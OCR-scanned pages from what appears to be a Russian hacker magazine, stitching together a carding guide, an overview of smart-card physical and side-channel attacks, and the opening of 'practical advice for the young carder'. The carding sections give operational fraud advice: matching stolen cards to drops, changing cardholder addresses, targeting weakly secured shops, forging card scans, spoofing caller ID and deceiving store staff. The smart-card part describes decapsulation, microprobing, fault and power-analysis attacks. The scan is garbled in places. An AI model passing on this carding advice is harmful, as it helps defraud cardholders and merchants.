Тебе также следует знать, что нас- 
тоящий американец совершает покуп- 
ки в интернет-магазине либо во время 


обеденного перерыва на работе, либо 
вечером у себя дома. Соответственно, 
В ЭТИ часы интернет-магазины получа- 
ют больше всего заказов, и у твоего 
заказа будет меньше шансов прив- 
лечь внимание менеджеров магазина. 
Отдельно стоит упомянуть покупки 
подарков на Рождество и другие 
праздники. В этот период с виртуаль- 
ных полок интернет-магазинов поку- 
патели метут все подряд, раскупается 
даже самый залежалый товар. Интер- 
нет-магазинам на этот период прихо- 
дится нанимать дополнительных ра- 
ботников. Также стоит обратить вни- 
мание на осфициальные выходные в 
той стране, на которой ты специализи- 
руешься. Заказы, сделанные в празд- 
ничные они, будут обработаны только 
через несколько дней, а эта задержка 
может стать роковой, так как у вла- 
дельца карты будет время, чтобы оп- 
ротестовать платеж. 


Кредитную карту для покупки в интер- 
нет-магазине следует подбирать 
очень тщательно. Карта должна соот- 
ветствовать штату, а лучше городу 
твоего дропа, тогда можно попробо- 
вать указать при заказе разные agpe- 
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са gpona и владельца карты и поста- 
раться убедить магазин, что ты (как 
владелец карты) решил сделать пода- 
рок своему племяннику на другом 
конце города. Если есть возможность, 
лучше купить карту с онлайн-досту- 
пом. В таких картах можно заходить 
на сайте банка в специальный раздел 
и менять там адрес держателя карты. 
Если адрес сменить на адрес дропа, то 
у магазина в принципе отпадут всякие 
сомнения в легальности покупки, так 
как он высылает покупку на адрес 
держателя карты. Но и тут все не так 
просто. Дело в том, что смена адреса 
держателя карты очень схожа с ша- 
манством и плясками с бубном вокруг 
костра. Иногда адрес на карте меняет- 
ся без вопросов, а иногда банк начи- 
нает сомневаться и ничего не получа- 
ется. Кстати, многие кардеры очень 
суеверные лючи :). 


Интернет-магазин, в котором будет 
сделан заказ, также надо тщательно 
подбирать. Не стоит делать заказ в 
больших интернет-магазинах с хоро- 
шей службой безопасности. Надо 
выбрать небольшой интернет-мага- 
зин, который обычно является лишь 
интернет-витриной обычного магази- 
на. Доля покупок через интернет в та- 
ком магазине очень мала, поэтому нет 
квалифицированного персонала, отс- 
леживающего покупки кардеров. 


Если интернет-магазину что-то кажет- 
ся подозрительным, он может потре- 
бовать выслать ему отсканированную 
кредитную карточку или спросит твой 
телефон, либо предложит тебе само- 
му позвонить в магазин. Скан кредит- 
ной карты наши умельцы тебе за нес- 
колько десятков баксов сделают та- 
кой, что будет лучше оригинала :), а 
вот с телефоном придется помучить- 
ся. Можно договориться со своим 
дропом о подтверждении по Tenecpo- 
ну, можно найти отдельного человека. 
И если с дропом все просто, то от- 
дельный человек может жить в дру- 
гом штате. Тогда придется пользо- 
ваться антиАОНами, которые подме- 


HAT номер телефона на TOT, который 
будет соответствовать штату дропа. 


В последнее время стала очень акту- 
альной тема по интернет-магазинам 
Австралии и Новой Зеландии. Из-за 
их отдаленности от других стран там 
существует лишь немногочисленный 
местный вещевой кардинг, который 
контролируется китайской масрией. 
Поэтому магазины без лишних вопро- 
сов шлют товар не только по своим 
странам, но и за границу, даже в Рос- 
сию. Правда, срок доставки в Россию 
намного больше, чем из Америки, из- 
за хуже развитых служб почтовой 
доставки. Еще одной проблемой явля- 
ется добыча австралийских и новозе- 
ланодских кредитных карт. Из-за того, 
что из этих стран мало кто кардит, 
очень малое количество карт можно 
приобрести. А если у продавца и по- 
являются австралийские кредитки, то 
по ценам в несколько раз больше 
американских или европейских. 


ОХ УЖ ЭТИ ДРОПЫ 

и Если магазин все-таки выслал то- 
вар, то все равно еще рано пить шам- 
панское и праздновать победу, так 
как между тобой и товаром есть еще 
дроп. Очень часто дропов берет ФБР, 
а иногда сами gponbl могут тебя ки- 
нуть. В найме дропа есть два пути. 
Первый - с самого начала все ему рас- 
сказать, чтобы он знал, на что идет. В 
этом случае он сможет подтверждать 
заказы по телефону и всячески спо- 
собствовать получению товара. Либо 
можно найти какую-нибудь домохо- 
зяйку, которая за несколько сотен в 
месяц будет не прочь подработать по- 
лучением и пересылкой посылок. Но у 
этого пути есть куча минусов. Домо- 
хозяйка, будучи существом глупым :), 
может делать такие вещи, которые ты 
себе и представить не сможешь. Нап- 
ример, был случай, когда на адрес та- 
кого вот дропа пришла посылка, но 
из-за того, что дропа несколько раз 
не заставали дома, посылку отправи- 
ли обратно в магазин. И это при том, 


a — a = 


что время прихода почтальон каждый 
раз согласовывал с домохозяйкой по 
телефону! Но даже когда товар благо- 
получно получен дропом и выслан те- 
бе, радоваться все еще рано. Бывали 
случаи, когда дроп путал адрес, и по- 
сылка отправлялась обратно. Радо- 
ваться будешь, когда товар будет уже 
у тебя в руках. 


А КАК ЖЕ РОССИЯ? 

и Многих, наверное, мучает вопрос 
о российских интернет-магазинах. Сам 
факт кардинга из российских магази- 
нов подразумевает использование 
кредитной карты нашего соотечест- 
венника. Среди кардеров существует 
негласное правило - не трогать своих. 
И если Ha кардерских cpopymax прос- 
какивает объявление о продаже базы 
с русскими кредитками, то оно сразу 
удаляется. Еще одна причина - бдя- 
щие :) службы безопасности интер- 
нет-магазинов, тесно сотрудничаю- 
щие с правоохранительными органа- 
ми. И если, кардя товар из американс- 
ких магазинов, кардер может не бес- 
покоиться, что из-за нескольких ноут- 
буков его объявят в международный 
розыск, то ФСБ по наводке российс- 
кого интернет-магазина быстро най- 
дет мошенника. 


БЕСКОНЕЧНАЯ ИСТОРИЯ 

и Несмотря ни на что, кардинг про- 
должает жить. И на каждую новую 
уловку магазинов найдется свое 
средство. Главное помнить, что все, в 
конечном счете, зависит от менедже- 
ра интернет-магазина, который зани- 
мается твоим заказом. Был у меня 
случай, когда магазин не захотел мне 
высылать товар, требуя телефонного 
звонка. Тогда я написал им жалобное 
письмо, что сейчас не имею доступа к 
телефону, а цифровой фотоаппарат 
предназначается моему сыну, у кото- 
рого через три дня день рождения. А 
подарок как раз тот, о котором сын 
давно мечтал. Я попросил выслать 
покупку и пообещал, что обязатель- 
но позвоню в магазин через неделю. 
И это сработало! Так что никогда не 
стоит забывать про человеческий 


фактор :). 


Отдельно 
стоит упо- 
мянуть по- 
купки по- 
дарков на 
Рождество и 
другие 
праздники. В 
этот период 
с виртуаль- 
ных полок 
интернет- 
магазинов 
покупатели 
метут все 
подряд, рас- 
купается да- 
же самый 
залежалый 
товар. 


Интернет- 
магазин, в 
котором бу- 
дет сделан 
заказ, также 
надо тща- 
тельно Nog- 
бирать. Не 
стоит де- 
лать заказ в 
больших ин- 
тернет-ма- 
газинах с 
хорошей 
службой бе- 
зопасности. 
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И ндустрия смарт-карт переживает период мощного расцвета. В 2002 году по всему миру было продано почти 2 миллиарда 
интеллектуальных карточек со встроенным микрочипом, а в ближайшие годы ожидается рост этих цифр в разы. 


ричины этого просты - 


области применения 


смарт-карт все время 


Практичес- 
ки все типы 


смарт-кар- 
точных чи- 
пов в евро- 
пейских, а 
затем в 
американс- 
ких и азиа- 
тских сис- 
темах плат- 
ного теле- 
видения бы- 
ли успешно 
вскрыты 
крякерами 
при помощи 
методов об- 
ратной ин- 
женерной 
разработки. 


Типичный 
Чиповый 
модуль 
смарт-кар- 
ты имеет 
тонкое 
пластиковое 
основание 
размером 
порядка og- 
ного KBag- 
ратного 
сантиметра 
с контакт- 
ными зона- 
ми с обеих 
сторон. 


расширяются: от теле- 
фонной карты до жето- 
на аутентификации пользователя ПК, 
от "электронного кошелька" для хра- 
нения цифровых наличных до цифро- 
Boro паспорта-идентификатора. Мас- 
совое внедрение смарт-карт в NOBCeg- 
невную жизнь сопровождается непре- 
менными заверениями официальных 
представителей индустрии о том, что 
чип-карты - это наиболее безопасная 
из существующих на сегодня техноло- 
гий, которую сложно (читай - практи- 
чески невозможно) вскрыть. Но мы с 
тобой знаем, что это вовсе не так :). 


Нравится это кому-то или нет, но 
вскрытие смарт-карт - явление весьма 
давнее и распространенное повсеме- 
CTHO. Как свидетельствуют специалис- 
ты, примерно с 1994 года практически 
все типы смарт-карточных чипов, ис- 
пользовавшихся в европейских, а за- 
тем в американских и азиатских систе- 
мах платного телевидения, были ус- 
пешно вскрыты крякерами при помо- 
щи методов обратной инженерной 
разработки. А добытые секреты карт 
(схема и ключевой материал) затем 
продавались на черном рынке в виде 
нелегальных клон-карт для просмотра 
закрытых ТВ-каналов на халяву. 


Менее освещено в прессе другое нап- 
равление - подделка телефонных 
смарт-карт или электронных кошель- 
ков. Однако известно, что и в этой об- 
ласти далеко не все в порядке с про- 
тиводействием взлому. Индустрии 
приходится регулярно заниматься об- 
новлением технологий защиты про- 
цессора смарт-карт, крякеры в ответ 
разрабатывают более изощренные 
методы вскрытия, и так до бесконеч- 
HOCTU. 


РАЗНОВИДНОСТИ ТЕХНОЛОГИЙ 
и Классификация методов вскрытия 
смарт-карт может несколько разли- 
чаться у разных авторов, однако чаще 
всего выделяют следующие категории 
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атак, которые обычно применяются в 
разных сочетаниях друг с другом. 


ТЕХНОЛОГИИ МИКРОЗОНДИРОВА- 
НИЯ - с помощью микроскопа и иглы 
микропробника позволяет получить 
доступ непосредственно к поверхнос- 
ти чипа, где атакующий регистрирует 
прохождение информации (побитно), 
манипулирует процессами и вмешива- 
ется в работу интегральной схемы. 


ПРОГРАММНЫЕ АТАКИ - используют 
обычный коммуникационный интер- 
фейс процессора смарт-карты и 
эксплуатирует уязвимости защиты, 
выявленные в протоколах, криптогра- 
фических алгоритмах и других осо- 
бенностях конкретной реализации 
схемы. Отмечу, что чем более зрелой 
является технология защиты, тем ча- 
ще приходится сочетать этот метод с 
другими методами атак. 


АНАЛИЗ ПОБОЧНЫХ КАНАЛОВ УТЕЧ- 
КИ ИНФОРМАЦИИ - атакующий с BbI- 
сокой по времени частотой снимает 
аналоговые характеристики колеба- 
ний в питании и интерфейсных соеди- 
нениях, а также любые другие элект- 
ромагнитные излучения, порождае- 
мые элементами схемы процессора 
(транзисторами, триггерами и т.п.) в 
ходе обычной работы. 


ТЕХНОЛОГИИ ИНДУЦИРОВАНИЯ 
СБОЕВ - напротив, создаются нештат- 
ные условия эксплуатации, чтобы 
вызвать ошибки в работе процессора 
и открыть таким образом дополни- 
тельные каналы доступа к защищен- 
ной информации. 


УСТРОЙСТВО СМАРТ-КАРТЫ 


РАЗРУШАЮЩИЕ АТАКИ 

и Типичный чиповый модуль смарт- 
карты имеет тонкое пластиковое осно- 
вание размером порядка одного KBag- 
ратного сантиметра с контактными зо- 
нами с обеих сторон. Одна сторона 
модуля видна на самой смарт-карте и 
контактирует со считывателем. Крем- 
ниевая матрица приклеена к другой 
стороне основания (подсоединение с 
помощью тонких золотых или алюми- 
ниевых проводов). Сторона пластины, 
где находится чип, покрыта эпоксид- 
ной смолой, и такой чиповый модуль 
вклеивается в карту. 


Вынуть чип из карты легко. Прежде 
умельцы вынимали с помощью остро- 
го ножа или ланцета, срезая пластик 
тыльной стороны карты до тех пор, 
пока не покажется эпоксидка. Позже 
стали быстро вынимать чип, просто 
разогревая пластмассу go мягкого 
состояния. Далее эпоксидный слой 
удаляется нанесением нескольких ка- 
пель концентрированной азотной кис- 
лоты (более 98%). Прежде чем кисло- 


та успевает растворить слишком мно- 


Обработка чипа концентрированной = 
азотной кислотой 


Ш Типичная смарт-карта - это 8-битный микропроцессор, постоян- 
ное запоминающее устройство (РОМ), оперативная память (RAM), 
электрически перепрограммируемая память (EEPROM или FLASH, 


где, в частности, хранится криптографический ключевой матери- 
ал), последовательные вход и выход. Все это хозяйство размеща- 
ется в одном чипе, заключенном в корпус - обычно пластиковую 
карту размером с кредитку. 


= = 

го эпоксидного слоя и затвердеть, 
кислоту и смолу смывают ацетоном. 
Процедура повторяется от 5 9010 раз, 
пока полностью не покажется кремни- 
евая матрица. Производить подобное 
надругательство над чипом необходи- 
мо аккуратно, чтобы не повредить со- 
единительную проводку, тогда OH ос- 
танется работоспособным. 


Если процессор совершенно новый, 
придется создать карту его схем. Сей- 
час для этого обычно применяют оп- 
тический микроскоп и цифровую ка- 
меру, с помощью которых делают 
большую (размером в несколько мет- 
ров) мозаику из снимков поверхности 
чипа высокого разрешения. 


У большинства чипов имеется защит- 
ный поверхностный слой (пассива- 
ция) из оксида или нитрата кремния, 
который предохраняет их от излуче- 
ний оборудования и диффузии ио- 
нов. Азотная кислота на него не 
действует, поэтому для его удаления 
специалисты используют сложный 
метод сухого травления. Но это не 
единственная возможность для дос- 
тупа к поверхности. 


Другим методом, особенно когда схе- 
ма в целом известна, является ис- 
пользование игл-микропробников, 
которые с помощью ультразвуковой 
вибрации удаляют защитный слой 
непосредственно под точкой контак- 
та. Кроме того, для локального уда- 
ления защитного слоя применяются 


лазерные резаки-микроскопы, ис- 
пользуемые в лабораториях клеточ- 
ной биологии. 


Описанная техника вскрытия, кото- 
рую, я надеюсь, ты не опух читать, ус- 
пешно применяется любителями-кря- 
керами. Именно любителями, так как 
технологии, описанные дальше, дос- 
тупны только хорошо оснащенным 
лабораториям, которые занимаются 
изучением полупроводников. В мире 
насчитываются сотни таких лаборато- 
рий (к примеру, в университетах и 
промышленных исследовательских 


из смарт-карты 


центрах). Наиболее продвинутые кря- 
керы арендуют эту технику. 


Исследование техники разрезания чи- 
па ведет к более общей (и сравни- 
тельно менее изученной) проблеме - 
атакам, которые включают в себя ак- 
тивную модификацию исследуемого 
чипа, а не просто пассивное его ис- 
следование. К примеру, есть все осно- 
вания полагать, что некоторые успеш- 
ные атаки пиратов на систему платно- 
го телевидения проводились с ис- 
пользованием рабочих станций с фо- 
кусированием ионного пучка (Focused 
lon Beam workstation - FIB). Такой ап- 
парат может вырезать траки в метал- 
лизированном слое чипа и формиро- 
вать новые траки или изолирующие 
слои. Кроме того, FIB может импланти- 
ровать ионы для изменения толщины 
слоя кремния и даже строить сквоз- 
ные переходы к проводящим структу- 
рам в нижележащих слоях чипа. Та- 
кие аппараты стоят несколько милли- 
онов долларов, но, как показывает 
практика, не слишком богатые злоу- » 


Смарт-кар- 
та - это 8- 
битный 
микропро- 
цессор, пос- 
тоянное за- 
поминаю- 
щее устрой- 
ство (ROM), 
оперативная 
память 
(РАМ), 
электричес- 
ки переп- 
рограмми- 
руемая па- 
мять (ЕЕР- 
ВОМ или 
FLASH), 
последова- 
тельные 
вход и вы- 
ход. 


В начале 
1990-х го- 
дов в Ка- 
вендишской 
лаборато- 
рии Кемб- 
риджа была 
создана 
технология 
обратного 
восстанов- 
ления схе- 
мы слож- 
ных крем- 
ниевых чи- 
пов, позво- 
ляющая ак- 
куратно 
снимать 
слои мик- 
росхемы 
один за 
другим. 


Типичная 
атака зак- 
лючается в 
отсоедине- 
нии от шины 
почти всех 


процессов 
ЦПУ, кроме 
памяти ЕЕР- 
ВОМ и той 
компоненты 
ЦПУ, что ге- 
нерирует 
доступ по 
чтению. 


При возник- 
новении сбоя 


в вычисле- 
ниях, компь- 
ютерное 
устройство 
может вы- 
дать инфор- 
мацию, по- 
лезную для 
восстановле- 
ния секрет- 
ных данных. 
Однако нас- 
колько серь- 
езна эта уг- 
роза в 
действи- 
тельности, 
долгое время 
мало кто по- 
дозревал. 


(2) ПРАКТИКА 


ЧТО ПОКАЗАЛО ВСКРЫТИЕ В 


мышленники арендуют дорогое обо- 
рудование на некоторое время у круп- 
ных полупроводниковых компаний. 


Обеспеченные таким инструментари- 
ем атаки на смарт-карты становятся 
более простыми и мощными. Типич- 
ная атака заключается в отсоедине- 
нии от шины почти всех процессов 
ЦПУ, кроме памяти EEPROM и той ком- 
поненты ЦПУ, что генерирует доступ 
по чтению. Например, программный 
счетчик может быть оставлен подсое- 
диненным таким образом, что области 
памяти по порядку становятся доступ- 
ны на считывание по мере подачи так- 
товых импульсов. 


Как только это сделано, атакующему 
требуется лишь одна игла микропроб- 
ника для считывания всего содержи- 
мого ЕЕРКОМ. В результате процесс 
анализа становится более легким, чем 
при пассивном исследовании, когда 
обычно анализируется только трасса 
выполнения. Также это помогает из- 
бежать чисто механических труднос- 
тей одновременной работы с несколь- 
кими иглами-микропробниками на ли- 
ниях шины, ширина которых состав- 
ляет лишь несколько микрон. 


ТЕХНОЛОГИИ 
ИНДУЦИРОВАНИЯ СБОЕВ 
(ГЛИЧ-АТАКИ) 

В принципе, создателям вычисли- 
тельной техники давно известно, что 
к инженерно-защищенным устрой- 


= ее. 


a wee 


Модифицированная атака Ha криптопроцессор с помощью 
рабочей станции FIB, позволяющая легко осуществить 


доступ к засекреченному содержимому EEPROM, используя 
единственную иглу-микропробник 


Снимок электронным микроскопом, 
демонстрирующий результаты 
обработки чипа сфокусированным 
ионным пучком (FIB) 


ствам, типа смарт-карт, которые обыч- 
но малы и компактны, с целью вызова 
вычислительной ошибки можно при- 
менить некоторые уровни радиацион- 
ного облучения или нагревания, пода- 
чу неправильного напряжения пита- 
ния или нестандартную тактовую час- 
тоту. Известно также и то, что при 
возникновении сбоя в вычислениях 
компьютерное устройство может вы- 
дать информацию, полезную для вос- 
становления секретных данных. OgHa- 
ко насколько серьезна эта угроза в 
действительности, долгое время мало 
кто подозревал. 


В конце сентября 1996 года коллектив 
авторов из Bellcore (научно-исследо- 


вательский центр американской ком- 
пании Bell) сообщил о том, что обна- 
ружена серьезная потенциальная 
слабость общего характера в защи- 
щенных криптографических устрой- 
ствах, в частности, в смарт-картах для 
электронных платежей (р. Boneh, R.A. 
DeMillo, К... Lipton: "On the Importance 
of Checking Cryptographic Protocols for 
Faults", ). AB- 
торы назвали свой метод вскрытия 
"Криптоанализ при сбоях оборудова- 
ния" (Cryptanalysis in the Presence of 
Hardware Faults). Суть же его в TOM, 
что, искусственно вызывая ошибку в 
работе электронной схемы с по- 
мощью ионизации или микроволново- 
го облучения, а затем сравнивая 
сбойные значения на выходе устрой- 
ства с заведомо правильными значе- 
ниями, теоретически можно восста- 
навливать криптографическую ин- 
формацию, хранящуюся в смарт-кар- 
те. Исследования ученых показали, 
что новой угрозе подвержены все 
устройства, использующие криптоал- 
горитмы с открытыми ключами для 
шифрования информации и аутенти- 
фикации пользователя. Это могут 
быть смарт-карты, применяемые для 
хранения данных (например, элект- 
ронных денег), 5!М-карточки для сото- 
вой телефонии, карточки, генерирую- 
щие электронные подписи или обес- 
печивающие аутентификацию поль- 
зователя при удаленном доступе к 
корпоративным сетям. Правда, разра- 
ботанная в Bellcore атака была приме- 
нима для вскрытия ключей исключи- 


Вид логического вентиля AND в 
конфокальном микроскопе (go и после 
очистки поверхности травлением) 


тельно в криптосхемах с открытым 
ключом - RSA, алгоритм цифровой 
подписи Рабина, схема идентисфика- 
ции Фиата-Шамира и т.д. 


Главным результатом публикации ра- 
боты Bellcore стало то, что к извест- 
ной в узком кругу проблеме было 
привлечено внимание гораздо боль- 
шего числа исследователей. И мень- 
ше чем через месяц после появления 
статьи Бонэ-ДеМилло (в октябре 1996 
года) стало известно о разработке ана- 
логичной теоретической атаки в отно- 
шении симметричных криптоалгорит- 
мов, то есть шифров закрытия данных 
с общим секретным ключом. Новый ме- 
TOg был разработан знаменитым тан- 
демом израильских криптографов Эли 
Бихамом и Ади Шамиром, получив наз- 
вание "Дифореренциальный анализ 
искажений" (сокращенно ДАИ). 


На примере самого распространенно- 
го блочного шифра DES эти авторы 
продемонстрировали, что в рамках 
той же "беллкоровской" модели сбоя 
в работе аппаратуры можно "выта- 
щить" полный ключ DES из защищен- 
ной смарт-карты путем анализа менее 
200 блоков шифртекста (блок DES - 8 
байт). Более того, впоследствии поя- 
вился еще ряд работ Бихама - Шами- 
ра с описанием методов извлечения 
ключа из смарт-карты в условиях, ког- 
да о реализованной внутри криптос- 
хеме неизвестно практически ничего. 
Окончательную версию статьи с опи- 
санием этой работы утягивай с 


АНАЛИЗ ПОБОЧНЫХ КАНАЛОВ 
УТЕЧКИ ИНФОРМАЦИИ 

Летом 1998 года пришло известие 
еще об одном методе вскрытия смарт- 
карт, более чем успешно реализован- 
ном на практике. Совсем небольшая, 
состоящая из 4 человек консалтинго- 
вая криптофирма Cryptography 
Research из Сан-Франциско разрабо- 
тала чрезвычайно эсфофрективный ана- 
литический инструментарий для изв- 
лечения секретных ключей из крип- 
тографических устройств. Забавно, 


Биты данных, зашитые в постоянную 
память чипа (РОМ после очистки) 


но, по словам главы фирмы Пола Ко- 
чера, исследователям "не удалось 
найти ни одной карты, которую нель- 
зя было бы вскрыть". 


При этом Кочер по образованию био- 
лог, а хакерством занимался с детства 
как хобби. Не исключено, что именно 
биологическое образование помогло 
ему выработать собственный стиль 
анализа "черных ящиков", относясь к 


ним как к живым организмам и внима- 
тельно исследуя все доступные приз- 
наки их "жизнедеятельности". 


Кочер и его коллеги, по сути, переи- 
зобрели секретные методы спецс- 
лужб и научились вскрывать защиту 
смарт-карт с помощью привлечения 
аппарата математической статистики 
и алгебраических методов исправле- 
ния ошибок для анализа сфлуктуа- 
ций (небольшие колебания) в пот- 
реблении чипом электропитания. Де- 
лалось это примерно в течение полу- 
тора лет с 1996 по 1998 год, когда 
специалисты Cryptography Research 
выясняли, каким образом можно бы- 
ло бы повысить стойкость портатив- 
ных криптографических жетонов, 
включая смарт-карты. Не предавая 
свои исследования широкой огласке, 
они знакомили сообщество произво- 
дителей смарт-карт с разработанны- 
ми в фирме видами атак, получив- 
шими названия "простой анализ пи- 
тания" (ПАП) и "дифференциальный 
анализ питания" (ДАП). Если хочешь 
покопаться в этом направлении глуб- » 


Участки слоя пассивации, удаленные 
ультрафиолетовым лазером для 
доступа иглы микропробника к 
контактным линиям шины данных 


Искусствен- 
но вызывая 
ошибку в 
работе 
электронной 
схемы с по- 
мощью ио- 
низации или 
микровол- 
нового об- 
лучения, а 
затем срав- 
нивая сбой- 
ные значе- 
ния на вы- 
ходе уст- 
ройства с 
заведомо 
правильны- 
ми значени- 
ями, теоре- 
тически 
можно вос- 
станавли- 
вать крип- 
тографи- 
ческую ин- 
формацию, 
хранящую- 
ся в смарт- 
карте. 


При этом 
Кочер по 
образова- 
нию биолог, 
а хакер- 
ством зани- 


мался с 
детства как 
хобби. Не 
исключено, 
что именно 
биологичес- 
кое образо- 
вание по- 
могло ему 
выработать 
собствен- 
ный стиль 
анализа 
"черных 
ящиков". 


Чаще всего 
критика в 
адрес диф- 
ференци- 
ального 
анализа ис- 
кажений 
(особенно 
со стороны 
выпускаю- 
щих смарт- 
карты 
фирм) сво- 
дилась к 
тому, что 
вся эта ме- 
тодика но- 
сит сугубо 
теоретичес- 
кий харак- 
тер. 


В традици- 
онном ана- 


лизе крип- 
тоустройств 
и защищен- 
ных прото- 
колов при- 
HATO пред- 
полагать, 
что входное 
и выходное 
сообщения 
доступны 
злоумыш- 
леннику, а 
какая-либо 
информация 
о ключах 
ему неизве- 
стна. 
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ЧТО ПОКАЗАЛО ВСКРЫТИЕ ) 


же, загляни по ссылочке 


Вполне очевидно, что такие методы 
анализа заслуживают самого серь- 
езного внимания, поскольку атаки 
такого рода можно проводить быст- 
ро и используя уже готовое обору- 
дование ценой от нескольких сотен 
до нескольких тысяч долларов. Ба- 
зовые же концепции новой методики 
вскрытия сформулированы в более 
ранней и довольно известной работе 
Пола Кочера "Криптоанализ на осно- 
ве таймерной атаки" (в 1995 году - 


). В этой работе бы- 
ло продемонстрировано, что можно 
вскрывать криптоустройства, просто 
точно замеряя интервалы времени, 
которые требуются на обработку 
данных. 


Lacey 


Что же касается ПАГ-атак, то здесь 
аналитик непосредственно наблюда- 
ет за динамикой потребления энер- 
гии системой. Количество pacxogye- 
мой энергии изменяется в зависимос- 
ти от выполняемой микропроцессо- 
ром инструкции, а для точного отсле- 
живания сфлуктуаций в потреблении 
питания можно использовать 
чувствительный амперметр. Так вы- 
являются большие блоки инструкций 
(циклы DES, операции RSA ит.п.), 
поскольку эти операции, выполняе- 
мые процессором, имеют внутри себя 
существенно различающиеся по ви- 
ду фрагменты. При большем усиле- 
нии удается выделять и отдельные 
инструкции. В то время Kak ПАП-ата- 
ки главным образом строятся на ви- 
зуальном анализе с целью выделе- 
ния значимых сфлуктуаций питания, 
значительно более эффективный 
метод ДАП построен на статистичес- 
ком анализе и технологиях исправле- 
ния ошибок gna выделения инорор- 
мации, имеющей корреляции с сек- 
ретными ключами. 


НОВЫЕ МЕТОДЫ АТАК 
И СЧИТЫВАНИЯ ИНФОРМАЦИИ 
ИЗ ПАМЯТИ 

В июне 2002 года был обнародо- 
ван еще один метод вскрытия смарт- 
карт и защищенных микроконтролле- 
ров, получивший название "optical 
fault induction attack" ("атака опти- 
ческим индуцированием сбоев" - 

). 

Этот класс атак был обнаружен и ис- 
следован в Кембриджском универси- 


тете аспирантом Сергеем Скоробога- 
товым (кстати, выпускником МИФИ 
1997 года) и его руководителем Рос- 
сом Андерсоном. 


Суть метода в том, что сфокусирован- 
ное освещение конкретного транзис- 
тора в электронной схеме стимупиру- 
ет в нем проводимость, чем вызыва- 
ется кратковременный сбой. Такого 
рода атаки оказываются довольно де- 
шевыми и практичными, GNA них не 
требуется сложного и дорогого лазер- 
ного оборудования. Например, сами 
кембриджские исследователи в каче- 
стве мощного источника света ис- 
пользовали фотовспышку, куплен- 


ную в магазине подержанных товаров 
за 20 фунтов стерлингов. 


Для иллюстрации мощи новой атаки 
была разработана методика, позволя- 
ющая с помощью вспышки и микрос- 
копа выставлять в нужное значение 
(О или 1) любой бит в 5КАМ-памяти 
микроконтроллера. Методом "опти- 
ческого зондирования" (optical prob- 
па) можно индуцировать сбои в рабо- 
те криптографических алгоритмов 
или протоколов, а также вносить ис- 
кажения в поток управляющих ко- 
MaHg процессора. Понятно, что пере- 
численные возможности существенно 
расширяют уже известные "сбойные" 


Внутренняя структура ВАМ (усилители 
и ячейки) 


методы вскрытия криптосхем и извле- 
чения секретной информации из 
смарт-карт. 


Индустрия, как обычно, пытается вся- 
чески принизить значимость нового 
метода вскрытия, поскольку он отно- 
сится к классу разрушающих атак, 
сопровождающихся повреждением 
защитного слоя в чипе смарт-карты. 
Однако, по свидетельству Андерсона, 
злоумышленники могут обойтись и 
минимальным физическим вмеша- 
тельством: кремний прозрачен в ино- 
ракрасном диапазоне, поэтому атаку 
можно проводить прямо через крем- 
ниевую подложку с задней стороны 


Сканирование лазером ячеек памяти 


чипа, сняв лишь пластик. Используя 
же рентгеновское излучение, карту и 
вовсе можно оставить нетронутой. 


МЕРЫ ПРОТИВОДЕЙСТВИЯ 
Арсенал средств защиты смарт- 
карт на сегодняшний день весьма 
разнообразен. Разрушающим мето- 
дам вскрытия могут противостоять 
емкостные датчики или оптические 
сенсоры под светонепроницаемой 
оболочкой (что крякеры давно нау- 
чились обходить). Либо "специаль- 
ный клей" - покрытие для чипов, ко- 
торое не только непрозрачно и об- 
ладает проводимостью, но также на- 


дежно противостоит попыткам унич- 
тожить его, обычно разрушая крем- 
ниевый слой, находящийся под ним. 
Такие покрытия относятся к феде- 
ральному стандарту США FIPS 140-1 
и широко используются в америка- 
нской военной промышленности, но 
повсеместно распространенными в 
быту их назвать нельзя. 


Ряд недорогих и эффективных мето- 
дов противодействия "дисффференци- 
альному анализу питания (ДАП)" и 
"дифоференциальному анализу ис- 
кажений (ДАИ)" известен по разра- 
боткам Cryptography Research. В 
частности, созданы особые аппарат- 
ные и программные методы, обеспе- 
чивающие значительно меньший 
уровень утечек компрометирующей 
информации, внесение шума в из- 
мерения, декоррелирование (разде- 
ление взаимозависимостей) внут- 
ренних переменных и секретных па- 
раметров, а также декоррелирова- 
ние по времени криптографических 
операций. 


Значительный ряд новых методов 
защиты предложен компьютерными 
лабораториями Лувена и Кембрид- 
жа ( 

4s 
Суть одного из них, например, зак- 
лючается в замене традиционных 
электронных схем самосинхронизи- 
рующейся "двухрельсовой" (dual- 
rail) схемой, где логические Ти О не 
кодируются, как обычно, импульса- 
ми высокого (Н) и низкого (L) напря- 
жения в единственном проводнике, 
а представляются парой импульсов 
(HL или LH) в двух проводниках. В 
этом случае появление "нештатной" 


: = РЕЯ —_- 
1 asa 


abs | bul A ыы 
пары импульсов вида (НН) сразу 
становится сигналом тревоги, приво- 
дящим, как правило, к перезагрузке 
процессора. 


Одно дело читать обо всех этих ме- 
тодах на бумаге и совсем другое - 
увидеть, как это работает реально. 
По свидетельству специалистов, 
открывающаяся картина действи- 
тельно впечатляет. И стимулирует, 
конечно же, на поиск новых мер 
противодействия с еще большим 


рвением. 


В июне 
2002 года 
был обнаро- 
дован еще 
один метод 
вскрытия 
смарт-карт 
и защищен- 
ных микро- 
контролле- 
ров, полу- 
чивший 
название 
"optical 
fault induc- 
tion attack" 
("атака оп- 
тическим 
индуциро- 
ванием сбо- 
ев" = 
www.cl.cam. 
ac.uk/~sps3 
2/chesO2- 
optofault.pdf). 


Суть мето- 
да в том, 
что сфоку- 
сированное 
освещение 
конкретного 
транзистора 
в электрон- 
ной схеме 
стимулиру- 
ет в нем 
проводи- 
мость, чем 
вызывается 
кратковре- 
менный 
сбой. 
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ПРАКТИЧЕСКИЕ СОВЕТЫ ЮНОМУ КАРДЕРУ 


орошо быть богатым. Покупать крутые тачки, водить девочек в рестораны, а на выходные мотаться куда-нибудь 
на Кипр. В основном поэтому люди и начинают заниматься кардингом - хочется быстрых денег, хочется на Кипр. 


о случается так, что 90- 


рога приводит не под 


пальмы, а прямиком в 


Если, нес- 
мотря на 
все ужасы, 
описанные в 
УК, ты все- 
таки ре- 
шился на 
ответствен- 
ный шаг, 
запомни 
простое, но 
важное пра- 
вило: "Мол- 
чание - зо- 
лото". 


После вли- 


вания в 
кардерский 
бизнес твои 
связи долж- 
ны разде- 
литься: 
личные и 
деловые. 
Те, с кем 
ты водишь 
дружбу и 
любовь, не 
должны ни- 
чего знать о 
делах. 


Если у тебя 
не стоит 
РСР, скачай 
эту нужную 
программу с 
сайта 


WWW.pgp.com 
и закриптуй 
свой винт 
так, чтобы 
самому 
страшно от 
такой защи- 
ты стало. 


тюремный барак, где 
небо в клеточку, а роль 
девочки играешь ты сам :). И виной 
тому не дяди в погонах, которые рано 
